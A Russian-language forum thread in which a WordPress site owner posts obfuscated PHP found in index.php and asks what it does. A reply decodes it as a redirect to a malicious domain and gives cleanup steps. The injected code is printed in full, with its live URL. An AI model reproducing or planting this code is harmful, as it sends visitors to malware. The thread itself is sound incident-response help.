Редирект на вредоносный сайт

Discussion in 'PHP' started by Jolland, 14 Aug 2021.

  1. Jolland

    Jolland New Member

    Joined:
    14 Aug 2021
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Имеется веб сайт на WordPress, и с недавнего времени обнаружилось то, что при переходе на него его блокирует антивирусы все, и на него невозможно зайти. Оказалось что на нем стоит редирект, и выяснилось то, что в файле index.php стоит зашифрованный код base64_decode.
    Прикрепляю полную версию кода:
    <?php $c = chr(104).chr(101).chr(97).chr(100).chr(101).chr(114); $c(base64_decode('TG9jYXRpb246IA==').chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(99).chr(108).chr(105).chr(99).chr(107).chr(46).chr(98).chr(101).chr(108).chr(111).chr(110).chr(110).chr(97).chr(110).chr(111).chr(116).chr(115).chr(101).chr(114).chr(118).chr(105).chr(99).chr(101).chr(46).chr(103).chr(97).chr(47).chr(106).chr(111).chr(98).chr(46).chr(112).chr(104).chr(112));die(); ?>
    Помогите его раскодировать, и посоветуйте то делать дальше.
     
  2. Lestatkiy

    Lestatkiy Member

    Joined:
    27 Sep 2010
    Messages:
    50
    Likes Received:
    22
    Reputations:
    5
    header Location: https://click.belonnanotservice.ga/job.php
    искать вебб шелл, смотреть в логи.. или полностю снести и переустановить двиг, желательно не ставить левые плагины..после всего этого сменить пароли админа wp, на cpanel если есть, фтп, ссх, мскл..
     
    alexzir, crlf and #colorblind like this.